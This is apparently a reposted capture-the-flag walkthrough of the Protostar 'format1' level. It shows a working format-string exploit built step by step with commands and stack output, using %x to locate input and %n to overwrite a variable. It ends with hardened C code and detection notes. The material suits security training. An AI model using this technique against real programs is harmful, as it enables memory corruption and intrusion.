
Protostar format1

About

This level shows how format strings can be used to modify arbitrary memory locations.
Hints: objdump -t is your friend, and your input string lies far up the stack :)
This level is at /opt/protostar/bin/format1

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)
{
    printf(string);

    if(target) {
        printf("you have modified the target :)\n");
    }
}

int main(int argc, char **argv)
{
    vuln(argv[1]);
}

I did not know how to do this level at first, because I had not looked into format strings much when writing C before, so I had never come across %n. A brief introduction to %n:
The %n format specifier stores the number of characters output so far into a variable; see the example below:
    int slen;
    printf("hello world%n", &slen);
After execution, the variable slen holds the value 11.

Now look at this level's printf(string): it is not the same as printf("%s", string), and that is exactly where the problem lies. When the input string itself is used as the format and %x directives are appended to it, printf reads the values for those directives straight from the stack.
First, get the address of target:
user@protostar:/opt/protostar/bin$ objdump -t ./format1 | grep target
08049638 g         O .bss     00000004                            target

Next we need to find the position on the stack where the write will land; %x can be used to dump the stack contents:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "aaaaaaaa" + "%x."*150+"%x"')
aaaaaaaa804960c.bffff628.8048469.b7fd8304.b7fd7ff4.bffff628.8048435.bffff7f1.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6a8.b7eadc76.2.bffff6d4.bffff6e0.b7fe1848.bffff690.ffffffff.b7ffeff4.804824d.1.bffff690.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6a8.1e6dfbd.2bb2c9ad.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff6d4.8048450.8048440.b7ff1040.bffff6cc.b7fff8f8.2.bffff7e7.bffff7f1.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff7cb.1f.bffffff2.f.bffff7db.0.0.0.19000000.5f0430f3.ed617f05.8671f725.69f2e525.363836.0.2e000000.726f662f.3174616d.61616100.61616161.2e782561.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e

Eyeballing it, our input appears at roughly the 128th %x; let's confirm:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "aaaaaaaa" + "%x."*128+"%x"')
aaaaaaaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.fa7bb769.d02f2179.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.c000000.ab329b49.980b02cb.973cca28.695fb6c8.363836.0.0.662f2e00.616d726f.61003174.61616161

Now replace the first 4 bytes with target's address:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print " \x38\x96\x04\x08aaaa" + "%x."*128+"%x"')
8aaaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.6a958dd0.40c11bc0.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.86000000.b6399ac7.1f57cabc.3bd68bc6.69c7f777.363836.0.0.662f2e00.616d726f.38003174.61080496
There is a one-byte misalignment, so adjust the padding:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "a\x38\x96\x04\x08aaa" + "%x."*128+"%x"')
a8aaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.fae225a2.d0b6b3b2.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.40000000.628ccb6c.1f6e8287.90ab45aa.6922104d.363836.0.0.662f2e00.616d726f.61003174.8049638

Good, the address now lines up exactly; all that remains is to replace the final %x with %n:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "a\x38\x96\x04\x08aaa" + "%x."*128+"%n"')
a8aaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.2f09ffa.28a409ea.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.89000000.3f3cec1e.c342fe8e.7223fa6a.699b71e8.363836.0.0.662f2e00.616d726f.61003174.you have modified the target :)
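As an added example (not part of the original post or of the Protostar sources), the %n behaviour introduced above and a hardened version of the level's vuln(), together with a small audit routine that counts genuine %n directives in a string shaped like the payload built in the walkthrough. count_with_n, count_n_directives and vuln_fixed are hypothetical names and the sample input is constructed.

```c
#include <stdio.h>
#include <string.h>

/* %n stores the number of characters emitted so far into the int its
 * argument points to. The count includes field-width padding, so the stored
 * value is chosen by the format, not by the text: ("hello world", 0) gives
 * 11 as on the page, ("abc", 40) gives 40. snprintf keeps the demo silent. */
int count_with_n(const char *text, int width)
{
    int written = -1;
    char buf[256];
    snprintf(buf, sizeof buf, "%*s%n", width, text, &written);
    return written;
}

/* Audit helper: walk a user-supplied string the way printf would and count
 * genuine %n directives, skipping "%%" and the optional flags, width,
 * precision and length fields ("%08x", "%hhn", "%*d") before the letter. */
int count_n_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (*++s == '%') continue;                              /* literal "%%" */
        while (*s && strchr("-+ #0123456789.*", *s)) s++;      /* flags, width, precision */
        while (*s && strchr("hlLqjzt", *s)) s++;                /* length modifiers */
        if (*s == 'n') n++;
        if (!*s) break;                                         /* input ended after '%' */
    }
    return n;
}

/* Hardened vuln(): the user string is a %s argument to a fixed format, so
 * directives inside it are never interpreted. printf's return value equals
 * strlen(string): nothing was expanded and no memory was written. */
int vuln_fixed(const char *string)
{
    return printf("%s", string);
}

int main(int argc, char **argv)
{
    /* Constructed sample input in the shape of the level's payload. */
    const char *input = argc > 1 ? argv[1] : "aaaa%x.%x.%n";
    printf("%%n directives in input: %d\n", count_n_directives(input));
    int printed = vuln_fixed(input);
    putchar('\n');
    return printed == (int)strlen(input) ? 0 : 1;
}
```

Compiling the level's own vuln() with gcc -Wformat -Wformat-security reports printf(string) as a non-literal format with no arguments, and glibc built with _FORTIFY_SOURCE aborts when a %n is found in a format string that lives in writable memory.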



Reposted from: http://aaarwkj.com/article6/pegjig.html
